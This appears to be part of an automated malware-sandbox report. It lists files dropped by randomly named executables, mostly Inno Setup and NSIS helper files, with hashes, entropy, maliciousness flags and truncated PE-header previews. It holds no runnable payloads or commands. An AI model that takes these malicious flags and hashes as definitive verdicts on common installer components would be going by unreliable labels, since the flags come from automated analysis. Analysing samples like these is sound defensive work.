                                                                                                                                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................~........................@..............................................@...............................%..................................................................................................................CODE.....}.......~.................. ..`DATA................................@...BSS......................................idata...%.......&..................@....tls.....................................rdata..............................@..P.reloc....... ......................@..P.rsrc...............................@..P.....................T..............@..P........................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\is-1046M.tmp\_isetup\_iscrypt.dll

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp
                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2560
                                                                                                                                                                                                                                Entropy (8bit):2.8818118453929262
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:e1GSgDIX566lIB6SXvVmMPUjvhBrDsqZ:SgDKRlVImgUNBsG
                                                                                                                                                                                                                                MD5:A69559718AB506675E907FE49DEB71E9
                                                                                                                                                                                                                                SHA1:BC8F404FFDB1960B50C12FF9413C893B56F2E36F
                                                                                                                                                                                                                                SHA-256:2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
                                                                                                                                                                                                                                SHA-512:E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W.c.W.c.W.c...>.T.c.W.b.V.c.R.<.V.c.R.?.V.c.R.9.V.c.RichW.c.........................PE..L....b.@...........!......................... ...............................@......................................p ..}.... ..(............................0....................................................... ...............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\is-1046M.tmp\_isetup\_setup64.tmp

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp
                                                                                                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):6144
                                                                                                                                                                                                                                Entropy (8bit):4.289297026665552
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:48:Sv1LfWvPcXegCPUo1vlZQrAxoONfHFZONfH3d1xCWMBFNL2pGSS4k+bkg6j0KHc:wfkcXegaJ/ZAYNzcld1xaX12pfSKvkc
                                                                                                                                                                                                                                MD5:C8871EFD8AF2CF4D9D42D1FF8FADBF89
                                                                                                                                                                                                                                SHA1:D0EACD5322C036554D509C7566F0BCC7607209BD
                                                                                                                                                                                                                                SHA-256:E4FC574A01B272C2D0AED0EC813F6D75212E2A15A5F5C417129DD65D69768F40
                                                                                                                                                                                                                                SHA-512:2735BB610060F749E26ACD86F2DF2B8A05F2BDD3DCCF3E4B2946EBB21BA0805FB492C474B1EEB2C5B8BF1A421F7C1B8728245F649C644F4A9ECC5BD8770A16F6
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....HP..........#............................@.............................`..............................................................<!.......P.......@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc........P......................@..@................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\is-1046M.tmp\_isetup\_shfoldr.dll

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp
                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):23312
                                                                                                                                                                                                                                Entropy (8bit):4.596242908851566
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
                                                                                                                                                                                                                                MD5:92DC6EF532FBB4A5C3201469A5B5EB63
                                                                                                                                                                                                                                SHA1:3E89FF837147C16B4E41C30D6C796374E0B8E62C
                                                                                                                                                                                                                                SHA-256:9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
                                                                                                                                                                                                                                SHA-512:9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\is-AMVCA.tmp\uOoBNdE6Sm5DmPd13osCbhQm.tmp

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Pictures\uOoBNdE6Sm5DmPd13osCbhQm.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):706560
                                                                                                                                                                                                                                Entropy (8bit):6.506350582279243
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12288:yTPcYn5c/rPx37/zHBA6a5UeYpthr1CERAgrNuR+dIq5MRxyF:6PcYn5c/rPx37/zHBA6pFptZ1CEQqMRU
                                                                                                                                                                                                                                MD5:1C1FD0B05187F81F28F910EB5B511E12
                                                                                                                                                                                                                                SHA1:9E9F7B8F19B461704AF327FC4E46DEE77E9C19CC
                                                                                                                                                                                                                                SHA-256:0EB10A29C808BB5783494E1C9A74410EFAC9A687A46E3056F7A783F9461E543F
                                                                                                                                                                                                                                SHA-512:08884CDD2CA4D4689E1886F23343B236907CBD999984B5D7AD18B3FC74D59B08F92A9231C1D412DBF9466CE76B7B11A54DB0CEB14C4292FA33557CF3D2273185
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................~........................@..............................................@...............................%..................................................................................................................CODE.....}.......~.................. ..`DATA................................@...BSS......................................idata...%.......&..................@....tls.....................................rdata..............................@..P.reloc....... ......................@..P.rsrc...............................@..P.....................T..............@..P........................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\is-C5JBD.tmp\_isetup\_iscrypt.dll

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmp
                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2560
                                                                                                                                                                                                                                Entropy (8bit):2.8818118453929262
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:e1GSgDIX566lIB6SXvVmMPUjvhBrDsqZ:SgDKRlVImgUNBsG
                                                                                                                                                                                                                                MD5:A69559718AB506675E907FE49DEB71E9
                                                                                                                                                                                                                                SHA1:BC8F404FFDB1960B50C12FF9413C893B56F2E36F
                                                                                                                                                                                                                                SHA-256:2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
                                                                                                                                                                                                                                SHA-512:E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W.c.W.c.W.c...>.T.c.W.b.V.c.R.<.V.c.R.?.V.c.R.9.V.c.RichW.c.........................PE..L....b.@...........!......................... ...............................@......................................p ..}.... ..(............................0....................................................... ...............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\is-C5JBD.tmp\_isetup\_setup64.tmp

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmp
                                                                                                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):6144
                                                                                                                                                                                                                                Entropy (8bit):4.289297026665552
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:48:Sv1LfWvPcXegCPUo1vlZQrAxoONfHFZONfH3d1xCWMBFNL2pGSS4k+bkg6j0KHc:wfkcXegaJ/ZAYNzcld1xaX12pfSKvkc
                                                                                                                                                                                                                                MD5:C8871EFD8AF2CF4D9D42D1FF8FADBF89
                                                                                                                                                                                                                                SHA1:D0EACD5322C036554D509C7566F0BCC7607209BD
                                                                                                                                                                                                                                SHA-256:E4FC574A01B272C2D0AED0EC813F6D75212E2A15A5F5C417129DD65D69768F40
                                                                                                                                                                                                                                SHA-512:2735BB610060F749E26ACD86F2DF2B8A05F2BDD3DCCF3E4B2946EBB21BA0805FB492C474B1EEB2C5B8BF1A421F7C1B8728245F649C644F4A9ECC5BD8770A16F6
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....HP..........#............................@.............................`..............................................................<!.......P.......@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc........P......................@..@................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\is-C5JBD.tmp\_isetup\_shfoldr.dll

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmp
                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):23312
                                                                                                                                                                                                                                Entropy (8bit):4.596242908851566
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
                                                                                                                                                                                                                                MD5:92DC6EF532FBB4A5C3201469A5B5EB63
                                                                                                                                                                                                                                SHA1:3E89FF837147C16B4E41C30D6C796374E0B8E62C
                                                                                                                                                                                                                                SHA-256:9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
                                                                                                                                                                                                                                SHA-512:9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Pictures\fwUkFVOLVOFs3NY104r7giRJ.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):706560
                                                                                                                                                                                                                                Entropy (8bit):6.506350582279243
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12288:yTPcYn5c/rPx37/zHBA6a5UeYpthr1CERAgrNuR+dIq5MRxyF:6PcYn5c/rPx37/zHBA6pFptZ1CEQqMRU
                                                                                                                                                                                                                                MD5:1C1FD0B05187F81F28F910EB5B511E12
                                                                                                                                                                                                                                SHA1:9E9F7B8F19B461704AF327FC4E46DEE77E9C19CC
                                                                                                                                                                                                                                SHA-256:0EB10A29C808BB5783494E1C9A74410EFAC9A687A46E3056F7A783F9461E543F
                                                                                                                                                                                                                                SHA-512:08884CDD2CA4D4689E1886F23343B236907CBD999984B5D7AD18B3FC74D59B08F92A9231C1D412DBF9466CE76B7B11A54DB0CEB14C4292FA33557CF3D2273185
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................~........................@..............................................@...............................%..................................................................................................................CODE.....}.......~.................. ..`DATA................................@...BSS......................................idata...%.......&..................@....tls.....................................rdata..............................@..P.reloc....... ......................@..P.rsrc...............................@..P.....................T..............@..P........................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmp

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Pictures\DAOYzG6VUKOTbMmRBP4iG9FF.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):706560
                                                                                                                                                                                                                                Entropy (8bit):6.506350582279243
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12288:yTPcYn5c/rPx37/zHBA6a5UeYpthr1CERAgrNuR+dIq5MRxyF:6PcYn5c/rPx37/zHBA6pFptZ1CEQqMRU
                                                                                                                                                                                                                                MD5:1C1FD0B05187F81F28F910EB5B511E12
                                                                                                                                                                                                                                SHA1:9E9F7B8F19B461704AF327FC4E46DEE77E9C19CC
                                                                                                                                                                                                                                SHA-256:0EB10A29C808BB5783494E1C9A74410EFAC9A687A46E3056F7A783F9461E543F
                                                                                                                                                                                                                                SHA-512:08884CDD2CA4D4689E1886F23343B236907CBD999984B5D7AD18B3FC74D59B08F92A9231C1D412DBF9466CE76B7B11A54DB0CEB14C4292FA33557CF3D2273185
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................~........................@..............................................@...............................%..................................................................................................................CODE.....}.......~.................. ..`DATA................................@...BSS......................................idata...%.......&..................@....tls.....................................rdata..............................@..P.reloc....... ......................@..P.rsrc...............................@..P.....................T..............@..P........................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\is-KGGV2.tmp\_isetup\_iscrypt.dll

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-0QBP9.tmp\FnzHBAPEbvEEx8ZWWEvo0R6a.tmp
                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2560
                                                                                                                                                                                                                                Entropy (8bit):2.8818118453929262
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:e1GSgDIX566lIB6SXvVmMPUjvhBrDsqZ:SgDKRlVImgUNBsG
                                                                                                                                                                                                                                MD5:A69559718AB506675E907FE49DEB71E9
                                                                                                                                                                                                                                SHA1:BC8F404FFDB1960B50C12FF9413C893B56F2E36F
                                                                                                                                                                                                                                SHA-256:2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
                                                                                                                                                                                                                                SHA-512:E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W.c.W.c.W.c...>.T.c.W.b.V.c.R.<.V.c.R.?.V.c.R.9.V.c.RichW.c.........................PE..L....b.@...........!......................... ...............................@......................................p ..}.... ..(............................0....................................................... ...............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\is-KGGV2.tmp\_isetup\_setup64.tmp

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-0QBP9.tmp\FnzHBAPEbvEEx8ZWWEvo0R6a.tmp
                                                                                                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):6144
                                                                                                                                                                                                                                Entropy (8bit):4.289297026665552
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:48:Sv1LfWvPcXegCPUo1vlZQrAxoONfHFZONfH3d1xCWMBFNL2pGSS4k+bkg6j0KHc:wfkcXegaJ/ZAYNzcld1xaX12pfSKvkc
                                                                                                                                                                                                                                MD5:C8871EFD8AF2CF4D9D42D1FF8FADBF89
                                                                                                                                                                                                                                SHA1:D0EACD5322C036554D509C7566F0BCC7607209BD
                                                                                                                                                                                                                                SHA-256:E4FC574A01B272C2D0AED0EC813F6D75212E2A15A5F5C417129DD65D69768F40
                                                                                                                                                                                                                                SHA-512:2735BB610060F749E26ACD86F2DF2B8A05F2BDD3DCCF3E4B2946EBB21BA0805FB492C474B1EEB2C5B8BF1A421F7C1B8728245F649C644F4A9ECC5BD8770A16F6
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....HP..........#............................@.............................`..............................................................<!.......P.......@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc........P......................@..@................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\is-KGGV2.tmp\_isetup\_shfoldr.dll

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-0QBP9.tmp\FnzHBAPEbvEEx8ZWWEvo0R6a.tmp
                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):23312
                                                                                                                                                                                                                                Entropy (8bit):4.596242908851566
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
                                                                                                                                                                                                                                MD5:92DC6EF532FBB4A5C3201469A5B5EB63
                                                                                                                                                                                                                                SHA1:3E89FF837147C16B4E41C30D6C796374E0B8E62C
                                                                                                                                                                                                                                SHA-256:9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
                                                                                                                                                                                                                                SHA-512:9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\is-TUI0V.tmp\mlSjlt4YcfcpuVp4aQsoCouK.tmp

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Pictures\mlSjlt4YcfcpuVp4aQsoCouK.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):706560
                                                                                                                                                                                                                                Entropy (8bit):6.506350582279243
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12288:yTPcYn5c/rPx37/zHBA6a5UeYpthr1CERAgrNuR+dIq5MRxyF:6PcYn5c/rPx37/zHBA6pFptZ1CEQqMRU
                                                                                                                                                                                                                                MD5:1C1FD0B05187F81F28F910EB5B511E12
                                                                                                                                                                                                                                SHA1:9E9F7B8F19B461704AF327FC4E46DEE77E9C19CC
                                                                                                                                                                                                                                SHA-256:0EB10A29C808BB5783494E1C9A74410EFAC9A687A46E3056F7A783F9461E543F
                                                                                                                                                                                                                                SHA-512:08884CDD2CA4D4689E1886F23343B236907CBD999984B5D7AD18B3FC74D59B08F92A9231C1D412DBF9466CE76B7B11A54DB0CEB14C4292FA33557CF3D2273185
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................~........................@..............................................@...............................%..................................................................................................................CODE.....}.......~.................. ..`DATA................................@...BSS......................................idata...%.......&..................@....tls.....................................rdata..............................@..P.reloc....... ......................@..P.rsrc...............................@..P.....................T..............@..P........................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\nscB4D3.tmp

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Pictures\jBpaTqUJP0LUZLvKSUzQoPLO.exe
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):517617
                                                                                                                                                                                                                                Entropy (8bit):6.169425634737511
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6144:htHPIkbNcJ6+M+pP4LRgnU1ICrxUqLsxy06Gm856Xorx9ioQbOF/rPsgTtprZP4i:3PNcsiFU1bxUyXGHlWbOF/rPsgTX2Xy
                                                                                                                                                                                                                                MD5:D250E182C8AF7D4BDD0BEF39EC690C41
                                                                                                                                                                                                                                SHA1:3E8977EDB07F8ED9FE6FD859A172B706F518280D
                                                                                                                                                                                                                                SHA-256:8DC0B7D5DC94CA4617C92AFC9BAC1505871FF404561EB99CB04923984E4B1FED
                                                                                                                                                                                                                                SHA-512:DA99DF8ADB9478BD7A559AE0B7AA769FBF0A6C968D843C9FAF44B105C2EB83690BB8D4AA49B0C5B59A46618E9A0E8A81DC2E0FDD5940F0DB1564D5C927F078C2
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:........,...................G...................................................................................................................................................................................................................................................................................g...............................................................j...........................................................................................................................................8...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\nsfAF74.tmp

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Pictures\aKsTqJOcX9LAZThGesUnxmZk.exe
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):517617
                                                                                                                                                                                                                                Entropy (8bit):6.169425634737511
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6144:htHPIkbNcJ6+M+pP4LRgnU1ICrxUqLsxy06Gm856Xorx9ioQbOF/rPsgTtprZP4i:3PNcsiFU1bxUyXGHlWbOF/rPsgTX2Xy
                                                                                                                                                                                                                                MD5:D250E182C8AF7D4BDD0BEF39EC690C41
                                                                                                                                                                                                                                SHA1:3E8977EDB07F8ED9FE6FD859A172B706F518280D
                                                                                                                                                                                                                                SHA-256:8DC0B7D5DC94CA4617C92AFC9BAC1505871FF404561EB99CB04923984E4B1FED
                                                                                                                                                                                                                                SHA-512:DA99DF8ADB9478BD7A559AE0B7AA769FBF0A6C968D843C9FAF44B105C2EB83690BB8D4AA49B0C5B59A46618E9A0E8A81DC2E0FDD5940F0DB1564D5C927F078C2
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:........,...................G...................................................................................................................................................................................................................................................................................g...............................................................j...........................................................................................................................................8...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\nso877A.tmp\INetC.dll

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exe
                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):22016
                                                                                                                                                                                                                                Entropy (8bit):5.666921368237103
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:384:KOoVVefeWsI7rsIquPLNN546o0Ac9khYLMkIX0+Gzyekv:4VVaeE7wIqyJN5i
                                                                                                                                                                                                                                MD5:2B342079303895C50AF8040A91F30F71
                                                                                                                                                                                                                                SHA1:B11335E1CB8356D9C337CB89FE81D669A69DE17E
                                                                                                                                                                                                                                SHA-256:2D5D89025911E2E273F90F393624BE4819641DBEE1606DE792362E442E54612F
                                                                                                                                                                                                                                SHA-512:550452DADC86ECD205F40668894116790A456FE46E9985D68093D36CF32ABF00EDECB5C56FF0287464A0E819DB7B3CC53926037A116DE6C651332A7CC8035D47
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9<.EXR.EXR.EXR.b.).LXR.EXS..XR.b. .FXR.b.(.DXR.b...DXR.b.*.DXR.RichEXR.................PE..L....T.[...........!.....8...P......I?.......P...................................................................... G..l....?..d.......(...............................................................................P............................text....7.......8.................. ..`.data....<...P.......<..............@....rsrc...(............D..............@..@.reloc...............N..............@..B........................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\nso92F3.tmp

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Pictures\0rb7lvvnt87bG7IAtAszCDpT.exe
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):517617
                                                                                                                                                                                                                                Entropy (8bit):6.169425634737511
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6144:htHPIkbNcJ6+M+pP4LRgnU1ICrxUqLsxy06Gm856Xorx9ioQbOF/rPsgTtprZP4i:3PNcsiFU1bxUyXGHlWbOF/rPsgTX2Xy
                                                                                                                                                                                                                                MD5:D250E182C8AF7D4BDD0BEF39EC690C41
                                                                                                                                                                                                                                SHA1:3E8977EDB07F8ED9FE6FD859A172B706F518280D
                                                                                                                                                                                                                                SHA-256:8DC0B7D5DC94CA4617C92AFC9BAC1505871FF404561EB99CB04923984E4B1FED
                                                                                                                                                                                                                                SHA-512:DA99DF8ADB9478BD7A559AE0B7AA769FBF0A6C968D843C9FAF44B105C2EB83690BB8D4AA49B0C5B59A46618E9A0E8A81DC2E0FDD5940F0DB1564D5C927F078C2
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
